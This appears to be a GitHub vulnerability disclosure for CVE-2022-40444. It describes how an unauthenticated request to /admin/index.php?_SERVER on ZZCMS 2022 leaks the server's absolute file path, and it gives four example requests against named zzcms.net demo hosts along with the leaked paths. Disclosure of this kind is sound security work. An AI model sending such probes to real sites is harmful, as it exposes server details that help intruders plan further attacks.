CVE-2022-40444: ZZCMS management landing page Path Disclosure · Issue #2 · liong007/ZZCMS

Attack vector(s):
zzcms is a set of content management system (CMS) of China’s zzcms team.
The zzcms 2022 version has a vulnerability that the zzcms management landing page leaks absolute path information. An unauthenticated attacker can obtain the error information showing the location (absolute path) of the application returned by the server by visiting “/admin/index.PHP? _server” on the zzcms management login page.

Product:
ZZCMS

Version:
ZZCMS 2022

Vendor Homepage:
http://www.zzcms.net/

Software Link:
http://www.zzcms.net/download/zzcms2022.zip

or
https://github.com/liong007/ZZCMS/releases/download/ZZCMS2022/zzcms2022.zip

POC:
Request "/admin/index php?_ Server", Response error information returned by the server showing the location (absolute path) of the application.

Affected pages:
All pages that contain page /admin/index php?_ Server

For Example :
You need to use an IP address in China to access
Case 1:
request http://demo.zzcms.net/admin/index.php?_SERVER

The response contains: Warning: Illegal string offset ‘REQUEST_URI’ in /www/users/HA165388/WEB/inc/global.php

Case 2:
request http://3158.zzcms.net/admin/index.php?_SERVER

The response contains: Warning: Illegal string offset ‘REQUEST_URI’ in D:\zzcms_xm\inc\global.php

Case 3:
request http://9.zzcms.net/admin/index.php?_SERVER

The response contains: Warning: Illegal string offset ‘REQUEST_URI’ in D:\jiu\inc\global.php

Case 4:
request http://hzp.zzcms.net/admin/index.php?_SERVER

The response contains: Warning: Illegal string offset ‘REQUEST_URI’ in D:\hzp\inc\global.php